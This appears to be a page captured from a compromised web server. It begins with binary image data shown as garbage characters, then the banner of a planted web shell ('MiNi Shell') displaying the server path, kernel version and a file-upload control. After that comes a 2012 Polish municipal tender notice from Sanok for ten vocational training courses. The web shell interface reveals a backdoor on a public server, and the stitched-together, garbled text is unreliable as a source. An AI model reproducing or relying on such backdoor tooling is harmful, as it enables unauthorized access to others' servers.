JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120517/109493-N-2012.html

<p class="kh_header"><b>Sanok: Organizacja i przeprowadzenie szkoleń zawodowych w ramach realizowanego przez Gminę Miasta Sanoka projektu Moje zmiany moim sukcesem współfinansowanego ze środków Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki w ramach priorytetu VII Promocja Integracji Społecznej</b><br>
<b>Numer ogłoszenia: 109493 - 2012; data zamieszczenia: 17.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Sanoka , ul. Rynek 1, 38-500 Sanok, woj. podkarpackie, tel. 013 4652800, 4652833, faks 013 4630890.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.um-sanok.e-zet.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkoleń zawodowych w ramach realizowanego przez Gminę Miasta Sanoka projektu Moje zmiany moim sukcesem współfinansowanego ze środków Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki w ramach priorytetu VII Promocja Integracji Społecznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie 10 szkoleń zawodowych dla 39 osób 
w ramach projektu Moje zmiany moim sukcesem realizowanego prze Gminę Miasta Sanoka w ramach PO KL Priorytet VII. Promocja integracji społecznej Działanie 7.2 Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej Poddziałanie 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym.
Zamówienie realizowane będzie w formie szkoleń zawodowych i zostało podzielone na 10 części:
1) Kurs: Kucharz małej gastronomii z obsługą kasy fiskalnej dla 4 uczestników w wymiarze 116h/osobę;
2) Kurs: Kierowca wózka jezdniowego z obsługą magazynu dla 7 uczestników w wymiarze 107h/osobę;
3) Kurs: Magazynier dla 1 uczestnika w wymiarze 90h/osobę;
4) Kurs: Bukieciarstwo florystyka I i II stopnia z obsługą kasy fiskalnej 
dla 11 uczestników w wymiarze 116h/osobę;
5) Kurs: Księgowość małych firm dla 3 uczestników w wymiarze 135h/osobę
6) Kurs: Obsługa obrabiarek sterowanych numerycznie dla 3 uczestników 
w wymiarze 150h/osobę.
7) Kurs: Kasjer sprzedawca dla 5 uczestników w wymiarze 90h/osobę
8) Kurs: Technolog prac wykończeniowych w budownictwie dla 3 uczestników w wymiarze 220h/osobę.
9) Kurs: Projektowanie stron www dla 1 uczestnika w wymiarze 100h/osobę.
10) Kurs: Wychowawca kolonijny/podwórkowy dla 1 uczestnika w wymiarze 100h/osobę.
Zamawiający zastrzega sobie prawo do zmniejszenia bądź zwiększenia liczby osób uczestniczących w szkoleniach. W przypadku zmiany liczby uczestników szkoleń rozliczenie usługi nastąpi na podstawie jednostkowej ceny szkolenia z oferty Wykonawcy.
W przypadku przerwania szkolenia przez uczestnika Zamawiający zapłaci Wykonawcy za usługę według poniższej kalkulacji: 
Kj x h = Ww
gdzie:
Kj - koszt jednoosobogodziny szkolenia brutto z oferty Wykonawcy
h - ilość godzin szkolenia na których obecny był uczestnik
Ww - wynagrodzenie Wykonawcy za uczestnika który przerwał zajęcia
W przypadku kursów Kucharz małej gastronomii z obsługą kasy fiskalnej oraz Bukieciarstwo/florystyka I i II stopnia z obsługą kasy fiskalnej Zamawiający nie przewiduje zwrotu kosztów materiałów które zostały zużyte do czasu rezygnacji uczestnika.
Zamawiający zastrzega sobie prawo do kontroli realizacji szkolenia w każdym czasie, a także prawo wglądu do dokumentów związanych z realizacją szkolenia w tym dokumentów finansowych oraz osobistego uczestnictwa w zajęciach.
Program szkoleń oraz ich przeprowadzenie musi odbyć się zgodnie z Rozporządzeniem Ministra Edukacji Narodowej oraz Ministra Pracy i Polityki Socjalnej z dnia 12 października 1993r. w sprawie zasad i warunków podnoszenia kwalifikacji zawodowych i wykształcenia ogólnego dorosłych (Dz. U. Nr 103, poz. 472 późn. zm.) oraz w oparciu o obowiązujące przepisy w zakresie uzyskiwania zezwolenia na kierowanie wózkiem jezdniowym (Warunkiem jest posiadanie pozwolenie na prowadzenie w/w kursu oraz wydawanie stosownych zaświadczenia u ukończeniu kursu).
Szkolenie powinno zakończyć się oceną nabytych umiejętności i wydaniem świadectwa o ukończeniu szkolenia, zgodnego z rozporządzeniem Ministra Edukacji 
i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Z 2006r. Nr 31 poz. 216). Ponadto powinny zostać również wydane certyfikaty bądź zaświadczenia uczestnictwa w szkoleniu oznakowane logiem Europejskiego Funduszu Społecznego oraz Programu Operacyjnego Kapitał Ludzki a także informacją, że projekt był współfinansowany ze środków EFS.
Szczegółową listę uczestników Zamawiający ustali z Wykonawcą przed rozpoczęciem szkolenia.
Miejsce realizacji: miasto Sanok
W ramach szkolenia Wykonawca zobowiązany jest do:
a) Skierowania uczestnika i pokrycia kosztów niezbędnych badań lekarskich, wyrobienie książeczki zdrowia (kucharz małej gastronomii, kasjer-sprzedawca) oraz pokrycia kosztów egzaminów, które należy ująć w cenie kursu. 
b) Przeprowadzenia zamówienia zgodnie z ustalonym programem nauczania 
oraz harmonogramem zajęć.
c) Sporządzenia kalkulacji dotyczącej kosztów materiałów niezbędnych dla realizacji części praktycznej kursu, która powinna stanowić oddzielną pozycję w kosztach ogólnych i wynosić dla:
- Kursu Kucharz małej gastronomi z obsługą kasy fiskalnej nie mniej niż 650, 00 zł na jednego uczestnika szkolenia.
- Kursu Bukieciarstwo florystyka I i II stopień z obsługą kasy fiskalnej nie mniej niż 400, 00 zł na jednego uczestnika
d) Zapewnienia uczestnikom niezbędnych materiałów szkoleniowych, które zostaną ujęte w cenie i przejdą w ich posiadanie.
e) Prowadzenie dokumentacji przebiegu szkolenia, tj. dziennika zajęć edukacyjnych zawierającego co najmniej: listę obecności, wymiar godzin zajęć edukacyjnych, tematy zajęć edukacyjnych; protokołu egzaminu oraz rejestru wydanych zaświadczeń, listy potwierdzające wypłatę zwrotu kosztów dojazdu oraz dostarczenie zamawiającemu w terminie 3 dni od dnia zakończenia szkolenia kserokopii wyżej wymienionych dokumentów.
f) Liczba godzin zajęć dziennie na osobę nie może być mniejsza niż 6 godzin lekcyjnych i nie większa niż 8 godzin lekcyjnych (z wyłączeniem Kursu operatora wózków widłowych gdzie ilość godzin zajęć regulują odrębne przepisy), 
z zapewnieniem przynajmniej jednej przerwy na posiłek.
g) Zapewnienie codziennego cateringu, na który składa się: obiad, kawa, herbata napoje ciastka.
h) Zajęcia szkoleniowe mogą odbywać się w układzie dni: poniedziałek - piątek, za wyjątkiem dni wolnych od pracy.
i) Zapewnienia podczas zajęć teoretycznych odpowiednich sal szkoleniowych do przeprowadzenia zajęć, wyposażonych w odpowiednią liczbę miejsc i stolików wraz z zapleczem sanitarnym.
j) Zapewnienie podczas zajęć praktycznych odpowiednich warunków pracy, niezbędnych materiałów, urządzeń narzędzi spełniających wymogi BHP w ilości 
i stanie technicznym zapewniającym odpowiedni poziom szkolenia oraz swobodny dostęp do stanowiska, przy którym będzie odbywała się praktyka.
k) Zapewnienia uczestnikom podczas zajęć praktycznych niezbędnych ubrań roboczych, obuwia roboczego i środków ochrony indywidualnej (zgodnie 
z przepisami BHP).
l) Zapoznanie uczestników poszczególnych szkoleń z przepisami BHP.
m) Zapewnienia dla wszystkich skierowanych uczestników szkoleń ubezpieczenia NW.
n) Uwzględnienia zróżnicowanego poziomu zdrowia, wykształcenia umiejętności 
i wiedzy uczestników szkoleń.
o) Zwrotu kosztów dojazdu uczestnikom szkoleń.
p) Przestrzegania bezwzględnego zakazu podawania napojów alkoholowych.
q) Wykonawca zobowiązany jest do przechowywania dokumentów związanych 
z realizowanym projektem do dnia 31.12.2020r. zgodnie z umową zawartą pomiędzy Wojewódzkim Urzędem Pracy a Gminą Miasta Sanoka.
r) Wykonawca realizujący szkolenie otwarte w ramach projektu zobowiązuje się 
do zarejestrowania instytucji szkoleniowej w internetowej bazie ofert szkoleniowych, dostępnej na stronie internetowej: www.inwestycjawkadry.pl i aktualizowania w tej bazie informacji o szkoleniu otwartym organizowanym w ramach projektu nie rzadziej niż raz w miesiącu.
s) Wykonawca jest zobowiązany do zawarcia z Zamawiającym umowy powierzenia przetwarzania danych osobowych.
t) Przeprowadzenia ankiet ewaluacyjnych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających polegających na powtórzeniu tego samego rodzaju zamówienia. Wartość zamówień uzupełniających, stanowić będzie nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunku udziału w postępowaniu 
na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu - Zamawiający nie stawia warunków szczegółowych, jednakże Zamawiający uzna warunek za spełniony jeżeli Wykonawca posiada potwierdzenie, wpisu do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunku udziału w postępowaniu 
na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu oraz żądanych dokumentów.
Warunki szczegółowe: Zamawiający wymaga aby wykonawca który ubiega 
się o udzielenie zamówienia wykazał iż przeprowadził w ostatnich trzech latach 
co najmniej 3 szkolenia a w przypadku Kursu: Projektowanie stron www oraz kursu: Wychowawca kolonijny/podwórkowy co najmniej 1 szkolenie (wykonane zamówienie musi być tożsame lub odpowiadające wybranej części zamówienia), a jeżeli okres prowadzenia działalności jest krótszy w tym okresie (należyte wykonanie usługi winno być potwierdzone referencjami bądź innymi dokumentami potwierdzającymi prawidłowe wykonanie usługi);</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunku udziału w postępowaniu - na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.
 Warunki szczegółowe:
W zakresie dysponowania potencjałem technicznym Zamawiający wymaga, aby Wykonawca dysponował dla kursu:
1) Kucharz małej gastronomii z obsługą kasy fiskalnej: Wykonawca musi dysponować odpowiednią salą szkoleniową do przeprowadzania zajęć teoretycznych, wyposażoną minimum w tablicę klasyczną, sprzęt audiowizualny, odpowiednią liczbę miejsc i stolików dostosowaną do ilości osób a na zajęciach praktycznych pracownię składającą się co najmniej 
z dwóch pomieszczeń wyposażonych w sprzęt oraz narzędzia kuchenne niezbędne dla 4 uczestników szkolenia.
2)Kierowca wózka jezdniowego z obsługą magazynu: Wykonawca musi dysponować min. 2 pojazdami, spełniającymi wymagania niniejszego kursu oraz odpowiednim placem manewrowym do przeprowadzenia szkolenia praktycznego lub przedstawić pisemne zobowiązanie innego podmiotu do oddania mu do dyspozycji ww. sprzętu i placu, na okres korzystania z nich przy wykonaniu zamówienia. Wykonawca musi również dysponować odpowiednią salą szkoleniową do przeprowadzania zajęć teoretycznych, wyposażoną minimum w tablicę klasyczną, sprzęt audiowizualny, odpowiednią liczbę miejsc i stolików oraz zapleczem sanitarnym dostosowanym do ilości osób.
3)Magazynier: Wykonawca musi dysponować odpowiednia salą szkoleniową 
do przeprowadzania zajęć teoretycznych, wyposażoną minimum w tablicę klasyczną, sprzęt audiowizualny, oraz odpowiednią liczbę stanowisk komputerowych dostosowaną do ilości osób, które są wyposażone w niezbędne oprogramowanie.
4)Bukieciarstwo/florystyka I i II stopień z obsługą kasy fiskalnej: Wykonawca musi dysponować odpowiednia salą szkoleniową do przeprowadzania zajęć teoretycznych i praktycznych, wyposażoną minimum w tablicę klasyczną, sprzęt audiowizualny, odpowiednią liczbę miejsc i stolików (stanowisk) oraz narzędzi niezbędnych podczas zajęć praktycznych.
5)Księgowość małych firm: Wykonawca musi dysponować odpowiednia salą szkoleniową do przeprowadzania zajęć, wyposażoną minimum w tablicę klasyczną, sprzęt audiowizualny, a także odpowiednią liczbę stanowisk komputerowych, (co najmniej 3 stanowiska komputerowe wraz z niezbędnym oprogramowaniem) oraz zapleczem sanitarnym dostosowanym do ilości osób.
6)Obsługa obrabiarek sterowanych numerycznie: Wykonawca musi dysponować odpowiednia salą szkoleniową do przeprowadzania zajęć teoretycznych, wyposażoną minimum w tablicę klasyczną, sprzęt audiowizualny, oraz odpowiednią liczbę miejsc i stolików oraz zapleczem sanitarnym dostosowanym do ilości osób, a na zajęciach praktycznych pracownię wyposażoną w niezbędne maszyny i urządzenia.
7) Kurs: Technolog prac wykończeniowych w budownictwie: Wykonawca musi dysponować odpowiednia salą szkoleniową do przeprowadzania zajęć teoretycznych, wyposażoną minimum w tablicę klasyczną, sprzęt audiowizualny, oraz odpowiednią liczbę miejsc i stolików a także zapleczem sanitarnym dostosowanym do ilości osób. 
8) Kurs: Kasjer sprzedawca: Wykonawca musi dysponować odpowiednia salą szkoleniową do przeprowadzania zajęć, wyposażoną minimum w tablicę klasyczną, sprzęt audiowizualny, a także odpowiednią liczbę stanowisk komputerowych, (co najmniej 5 stanowisk komputerowych wraz z niezbędnym oprogramowaniem) oraz zapleczem sanitarnym dostosowanym do ilości osób. 
9) Kurs: Projektowanie stron www: Wykonawca musi dysponować odpowiednia salą szkoleniową do przeprowadzania zajęć, wyposażoną minimum w tablicę klasyczną, sprzęt audiowizualny, a także odpowiednią liczbę stanowisk komputerowych, wraz z niezbędnym oprogramowaniem) oraz zapleczem sanitarnym dostosowanym do ilości osób. 
10)Kurs: Wychowawca kolonijny/podwórkowy: Wykonawca musi dysponować odpowiednia salą szkoleniową do przeprowadzania zajęć, wyposażoną minimum w tablicę klasyczną, sprzęt audiowizualny, oraz odpowiednią liczbę miejsc i stolików 
a także zapleczem sanitarnym dostosowanym do ilości osób.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunku udziału w postępowaniu - na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.
Warunki szczegółowe:
W zakresie dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający wymaga, aby Wykonawca dysponował dla kursu:
1)Kucharz małej gastronomii z obsługą kasy fiskalnej:  Wykonawca winien dysponować minimum 1 osobą posiadającą odpowiednie wykształcenie i kwalifikacje zawodowe (uprawnienia pedagogiczne do nauki zawodu), która przeprowadziła co najmniej trzy usługi o łącznym wymiarze min. 200h. potwierdzone odpowiednimi referencjami.
2)Kierowca wózka jezdniowego z obsługą magazynu:  Wykonawca winien dysponować minimum 2 osobami posiadającymi odpowiednie wykształcenie i kwalifikacje zawodowe oraz przeprowadziły co najmniej trzy usługi o łącznym wymiarze min. 100h. potwierdzone odpowiednimi referencjami.
3) Magazynier: Winien dysponowć minimum 2 osobami posiadającymi odpowiednie wykształcenie i kwalifikacje zawodowe które przeprowadziły 
co najmniej trzy usługi o łącznym wymiarze min. 100h. potwierdzone odpowiednimi referencjami.
6) Obsługa obrabiarek sterowanych numerycznie:  dysponowanie minimum 2 osobami, które posiadają odpowiednie wykształcenie i kwalifikacje zawodowe. oraz przeprowadziły co najmniej trzy usługi o łącznym wymiarze min. 100h. potwierdzone odpowiednimi referencjami.
7)Kurs: Technolog prac wykończeniowych w budownictwie: Wykonawca winien dysponować minimum 2 osobami, które posiadają odpowiednie wykształcenie 
i kwalifikacje zawodowe. oraz przeprowadziły co najmniej trzy usługi 
o łącznym wymiarze min. 100h. potwierdzone odpowiednimi referencjami.
8) Kurs: Kasjer sprzedawca: Wykonawca winien  dysponować minimum 2 osobami posiadającymi odpowiednie wykształcenie i kwalifikacje zawodowe oraz przeprowadziły co najmniej trzy usługi o łącznym wymiarze min. 100h. potwierdzone odpowiednimi referencjami.
9) Kurs: Projektowanie stron www: Wykonawca  winien  dysponować minimum 1 osobą posiadającą odpowiednie wykształcenie i kwalifikacje zawodowe. oraz przeprowadziły co najmniej dwie usługi o łącznym wymiarze min. 100h. potwierdzone odpowiednimi referencjami.
10) Kurs: Wychowawca kolonijny/podwórkowy: Wykonawca winien dysponować minimum 1 osobą, która posiadaja odpowiednie wykształcenie i kwalifikacje zawodowe oraz przeprowadziła co najmniej dwie usługi o łącznym wymiarze min. 100h. potwierdzone odpowiednimi referencjami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunku udziału w postępowaniu - na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu - Zamawiający nie stawia warunków szczegółowych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
